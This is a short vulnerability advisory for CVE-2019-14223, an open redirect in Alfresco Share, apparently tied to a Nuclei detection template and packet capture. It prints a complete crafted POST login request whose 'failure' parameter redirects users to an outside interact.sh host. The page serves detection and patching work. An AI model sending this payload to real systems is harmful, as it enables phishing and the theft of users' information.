| Title | Alfresco Share - Open Redirect |
|---|---|
| Author | pdteam |
| Severity | Medium |
| Impact | An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information. |
| Remediation | Apply the latest security patches or updates provided by Alfresco to fix the open redirect vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.59279 |
| CVE ID | CVE-2019-14223 |
| CWE ID | CWE-601 |
| Tags | cve cve2019 redirect alfresco vkev vuln |
Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
POST /share/page/dologin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-14223.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-14223.pcap
N/AN/A